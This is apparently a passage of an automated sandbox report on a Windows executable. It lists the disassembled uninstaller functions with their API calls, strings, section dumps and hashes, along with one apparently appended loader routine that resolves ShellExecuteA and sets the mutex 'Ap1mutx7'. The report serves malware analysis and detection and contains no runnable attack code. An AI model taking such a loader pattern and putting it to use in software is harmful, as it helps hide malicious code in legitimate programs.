                                  • String ID: GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
                                  • API String ID: 2940365033-1046234306
                                  • Opcode ID: 9a5412f819f3c6c220af884810bdabe01b2ab99d1a25e3feb164289698fc1059
                                  • Instruction ID: 42f2fc5e58c2a1c02fc318937c309734d675263f87d4be835cb98964fc3c32e4
                                  • Opcode Fuzzy Hash: 9a5412f819f3c6c220af884810bdabe01b2ab99d1a25e3feb164289698fc1059
                                  • Instruction Fuzzy Hash: EE41E872D06315BEDF21AFB69C859AF7BA6EF44304B94093FE400E2140DB7C95948B5E
                                  Function 00408A80 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 113filethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • SetFileAttributesA.KERNEL32(?,00000080,?,?), ref: 00408B1C
                                  • CopyFileA.KERNEL32(?,?,00000000), ref: 00408B38
                                  • GetCurrentThreadId.KERNEL32 ref: 00408B42
                                  • GetCurrentProcessId.KERNEL32(00000000), ref: 00408B49
                                  • _sprintf.LIBCMT ref: 00408B64
                                  • _sprintf.LIBCMT ref: 00408B94
                                  • CreateDirectoryA.KERNEL32(?,00000000), ref: 00408BA3
                                  • CopyFileA.KERNEL32(?,?,00000000), ref: 00408BBA
                                    • Part of subcall function 00401820: _sprintf.LIBCMT ref: 0040186E
                                  Strings
                                  • NvCopyFile: invalid number of arguments, xrefs: 00408ABF
                                  • %s\%s, xrefs: 00408B8E
                                  • UninstCommandClass::NvCopyFileVerCheck, xrefs: 00408A9D
                                  • %c:\NV%d%d.TMP, xrefs: 00408B5E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: File_sprintf$CopyCurrentTime_fputs$AttributesCreateDebugDirectoryFormatLocalMutexObjectOutputProcessReleaseSingleStringThreadWait_fprintf
                                  • String ID: %c:\NV%d%d.TMP$%s\%s$NvCopyFile: invalid number of arguments$UninstCommandClass::NvCopyFileVerCheck
                                  • API String ID: 2568154830-690563461
                                  • Opcode ID: 20c95fc38083d052249822bca42f6b0be08be824ba3e80b0112c502072a75f56
                                  • Instruction ID: 880ecb89309b56fdde9e9b2a18346d4b9387fd29177224c26b984ed91fdb3e54
                                  • Opcode Fuzzy Hash: 20c95fc38083d052249822bca42f6b0be08be824ba3e80b0112c502072a75f56
                                  • Instruction Fuzzy Hash: 4A3188F6600700ABD224E7658D55FEB73A99F98700F00492EB796A72C1DE78E405C7A9
                                  Function 0047C365 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 51librarysleeploaderCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\LisectAVT_2403002B_38.exe,000001FE,75550000,LoadLibraryA), ref: 0047C2DD
                                  • LoadLibraryA.KERNELBASE(SHELL32.DLL), ref: 0047C2F8
                                  • GetProcAddress.KERNELBASE(00000000,ShellExecuteA), ref: 0047C306
                                  • CreateMutexA.KERNEL32(00000000,00000000,Ap1mutx7), ref: 0047C333
                                  • GetLastError.KERNEL32(00000000), ref: 0047C33A
                                  • Sleep.KERNEL32(000927C0), ref: 0047C349
                                  • ExitProcess.KERNEL32(00000000), ref: 0047C351
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: AddressCreateErrorExitFileLastLibraryLoadModuleMutexNameProcProcessSleep
                                  • String ID: Ap1mutx7$C:\Users\user\Desktop\LisectAVT_2403002B_38.exe$SHELL32.DLL$ShellExecuteA$open
                                  • API String ID: 1721171764-1628270251
                                  • Opcode ID: 6c104a0f6e62e68dee18ecc3bd055f43f38d5ef494515f981eb1106d6201b215
                                  • Instruction ID: b6538c3db6ab6f8f24c4974401cf30b671cc78b6316f560e3626dbd79c8d7e65
                                  • Opcode Fuzzy Hash: 6c104a0f6e62e68dee18ecc3bd055f43f38d5ef494515f981eb1106d6201b215
                                  • Instruction Fuzzy Hash: 4B11D2312442496AEF10DEA08D4DFEA365C9F44B05F048419FE09EE1E0DAB59704876F
                                  Function 00405C40 Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 219registryCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                    • Part of subcall function 0040B97F: __mbsstr_l.LIBCMT ref: 0040B989
                                  • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?,?,?,?,?,?), ref: 00405D2B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Time_fputs$DebugFormatLocalMutexObjectOpenOutputReleaseSingleStringWait__mbsstr_l_fprintf
                                  • String ID: %s\%s$%s\%s\%s$UninstCommandClass::NvEnumKeys$\$\{*
                                  • API String ID: 1480039975-2666356572
                                  • Opcode ID: 0d01d8f83e1a2188cec3db82c679319051114f034373fdac95e3a596b26bc318
                                  • Instruction ID: b6ad12d341861cce78118837af77ae308dbf8b480cd39bf16652fddade545e61
                                  • Opcode Fuzzy Hash: 0d01d8f83e1a2188cec3db82c679319051114f034373fdac95e3a596b26bc318
                                  • Instruction Fuzzy Hash: 337180716083419FD310DB64CC85FABB7E8EF89304F14492EF989A7281E778E904CB96
                                  Function 00403E70 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 86synchronizationtimeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 0040C02B: __vsprintf_l.LIBCMT ref: 0040C039
                                  • OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 0040C3E9: __fsopen.LIBCMT ref: 0040C3F3
                                  • GetLocalTime.KERNEL32(?), ref: 00403EF3
                                  • GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                  • _fprintf.LIBCMT ref: 00403F35
                                  • _fputs.LIBCMT ref: 00403F56
                                  • _fputs.LIBCMT ref: 00403F75
                                  • ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Time_fputs$DebugFormatLocalMutexObjectOutputReleaseSingleStringWait__fsopen__vsprintf_l_fprintf
                                  • String ID: $%s - %s(%d) - $hh':'mm':'ss tt
                                  • API String ID: 1162515530-124859373
                                  • Opcode ID: 3780f2a0d93e358a6c29f8f2988d7a435293a3d9557ded2ec510d2843d4a4b53
                                  • Instruction ID: 278b2e53d12784d2c02260523d4ec11e9ba5653ffe50f22f347f222bb60f5bbe
                                  • Opcode Fuzzy Hash: 3780f2a0d93e358a6c29f8f2988d7a435293a3d9557ded2ec510d2843d4a4b53
                                  • Instruction Fuzzy Hash: F631F8B2600201EBC320DB54DC86EEB776CFB88704F44863EB515961D1E7789546CBAE
                                  Function 0040A790 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 67COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetFileAttributesA.KERNEL32(?), ref: 0040A7B2
                                  • RemoveDirectoryA.KERNEL32(?), ref: 0040A7BE
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Time_fputs$AttributesDebugDirectoryFileFormatLocalMutexObjectOutputReleaseRemoveSingleStringWait_fprintf
                                  • String ID: Directory deleted$Failure deleting directory$File [%s] deleted$File [%s] queued for delete at reboot$NULL$UninstCommandClass::NvDeleteFile(%s)
                                  • API String ID: 2197460971-4186244654
                                  • Opcode ID: a3adb2b2094c677d35bc9ef3785804157e39864c874141277bf615064de83aa0
                                  • Instruction ID: 313d36747d0dabf9f21de1c353cd5bb380562bf5db678d566fd203420dcc2aac
                                  • Opcode Fuzzy Hash: a3adb2b2094c677d35bc9ef3785804157e39864c874141277bf615064de83aa0
                                  • Instruction Fuzzy Hash: AF11E3B264021027C2107A29BC02FDF66488FA1324F04803BF804F62C2D6BC9D9781EF
                                  Function 0040EE5E Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 49libraryloaderCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • GetModuleHandleA.KERNEL32(KERNEL32.DLL,004232D8,0000000C,0040EF6F,00000000,00000000,?,?,0040EF9A,?,0040B462,?,0040B4E2,?), ref: 0040EE6F
                                  • GetProcAddress.KERNEL32(0040B4E2,EncodePointer), ref: 0040EEA3
                                  • GetProcAddress.KERNEL32(0040B4E2,DecodePointer), ref: 0040EEB3
                                  • InterlockedIncrement.KERNEL32(004253E8), ref: 0040EED5
                                  • __lock.LIBCMT ref: 0040EEDD
                                  • ___addlocaleref.LIBCMT ref: 0040EEFC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: AddressProc$HandleIncrementInterlockedModule___addlocaleref__lock
                                  • String ID: DecodePointer$EncodePointer$KERNEL32.DLL$p`B$SB
                                  • API String ID: 1036688887-3353757658
                                  • Opcode ID: 0e13ec3f6d335226b1ca22a06e0cdc50d66b7e994675582999a593141d4a9725
                                  • Instruction ID: 987111c9388a5b1d51fb8aa43ea66616588b75e93f66127e2b923ad2a27a1228
                                  • Opcode Fuzzy Hash: 0e13ec3f6d335226b1ca22a06e0cdc50d66b7e994675582999a593141d4a9725
                                  • Instruction Fuzzy Hash: A11182B0A40705EED7209F76D805B9ABBE0EF44314F50496FE8A6A62E1CB789940CF59
                                  Function 00408440 Relevance: 18.1, APIs: 3, Strings: 9, Instructions: 85COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • CoInitialize.OLE32(00000000), ref: 00408480
                                    • Part of subcall function 00401820: _sprintf.LIBCMT ref: 0040186E
                                  Strings
                                  • UninstCommandClass::CheckRAID - Failed to initialize COM, xrefs: 0040848A
                                  • CheckRAID: invalid number of arguments, xrefs: 00408468
                                  • NVRAID_ARRAY_DEVICE, xrefs: 004084C4
                                  • TRUE, xrefs: 0040851C
                                  • UninstCommandClass::CheckRAID, xrefs: 00408442
                                  • RAID is enabled, xrefs: 00408509
                                  • FALSE, xrefs: 004084A5
                                  • RAID not enabled (failed to get array device enumerator), xrefs: 004084DE
                                  • RAID not enabled (failed to connect to ROOT\WMI), xrefs: 004084BD
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Time_fputs$DebugFormatInitializeLocalMutexObjectOutputReleaseSingleStringWait_fprintf_sprintf
                                  • String ID: CheckRAID: invalid number of arguments$FALSE$NVRAID_ARRAY_DEVICE$RAID is enabled$RAID not enabled (failed to connect to ROOT\WMI)$RAID not enabled (failed to get array device enumerator)$TRUE$UninstCommandClass::CheckRAID$UninstCommandClass::CheckRAID - Failed to initialize COM
                                  • API String ID: 1053487729-914542017
                                  • Opcode ID: f09f7904738a1945c1226c3e4085f644212955ce82d1d8d4ab6adc370d376232
                                  • Instruction ID: 29c6eacce0db0b0e3343b95ef391c25fa63cf2e37afda36465b898a1b3433f28
                                  • Opcode Fuzzy Hash: f09f7904738a1945c1226c3e4085f644212955ce82d1d8d4ab6adc370d376232
                                  • Instruction Fuzzy Hash: A7210A763042006BD214BA67ED42E9F7649AFA4718B14443FF809A32C2DA7DA89181DE
                                  Function 00409BB0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 116COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • _memset.LIBCMT ref: 00409BFB
                                  • SetupDiSetDeviceInstallParamsA.SETUPAPI ref: 00409C16
                                  • SetupDiBuildDriverInfoList.SETUPAPI(?,?,00000001), ref: 00409C26
                                  • _memset.LIBCMT ref: 00409C4F
                                  • SetupDiEnumDriverInfoA.SETUPAPI ref: 00409C77
                                  • SetupDiDestroyDriverInfoList.SETUPAPI(?,?,00000001), ref: 00409D27
                                    • Part of subcall function 0040BBAC: __mbsicmp_l.LIBCMT ref: 0040BBB6
                                  • _memset.LIBCMT ref: 00409CAE
                                  • SetupDiGetDriverInfoDetailA.SETUPAPI ref: 00409CDE
                                    • Part of subcall function 004092E0: SetupDiSetSelectedDevice.SETUPAPI(?,?), ref: 0040932D
                                    • Part of subcall function 004092E0: _memset.LIBCMT ref: 0040934A
                                    • Part of subcall function 004092E0: SetupDiSetDeviceInstallParamsA.SETUPAPI(?,?,00000128), ref: 00409389
                                    • Part of subcall function 004092E0: SetupDiCallClassInstaller.SETUPAPI(00000016,?,?), ref: 00409397
                                    • Part of subcall function 004092E0: SetupDiBuildDriverInfoList.SETUPAPI(?,?,00000002), ref: 004093A5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Setup$DriverInfo$_memset$DeviceList$BuildInstallParamsTime_fputs$CallClassDebugDestroyDetailEnumFormatInstallerLocalMutexObjectOutputReleaseSelectedSingleStringWait__mbsicmp_l_fprintf
                                  • String ID: Microsoft$UninstCommandClass::InstallITBDriver
                                  • API String ID: 1981627633-369273916
                                  • Opcode ID: 57a4cffe7a14b867e8932c976c21d90d98cc9c28e645a329069c4cbb35faba21
                                  • Instruction ID: 79902e13d2512c74ec99e1bc91030035d56514d2eb5624bf92bfa92e69f4fdc4
                                  • Opcode Fuzzy Hash: 57a4cffe7a14b867e8932c976c21d90d98cc9c28e645a329069c4cbb35faba21
                                  • Instruction Fuzzy Hash: EC4188B2548304ABD320DF54DC45FEBB3ECEB98704F40492DB649961C1DBB9A908CB9A
                                  Function 00409590 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 110COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
